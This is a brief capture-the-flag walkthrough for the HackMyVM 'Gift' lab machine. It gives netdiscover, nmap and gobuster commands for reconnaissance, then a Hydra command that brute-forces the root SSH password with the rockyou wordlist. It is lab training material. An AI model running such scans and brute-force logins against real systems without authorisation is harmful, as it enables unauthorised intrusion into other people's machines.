Gift

machine downloaded from https://hackmyvm.eu/

difficulty: Easy

OS: Linux

1. Scan the network

sudo netdiscover -i eth0 -r 192.168.5.0/24

2. port and service scanning with nmap

sudo nmap -p- -sS -sC -sV --min-rate=5000 -n -Pn -vvv 192.168.5.58
-oN report.txt

This machine has 2 services exposed ssh and http on ports 22 and 80

3. We can try enum urls with gobuster, but we don’t find anything of interest

gobuster dir -u http://192.168.5.58/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

4. We can try brute force with Hydra:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.5.58

We found the root password.

5. Finally, we can log in and search the flags.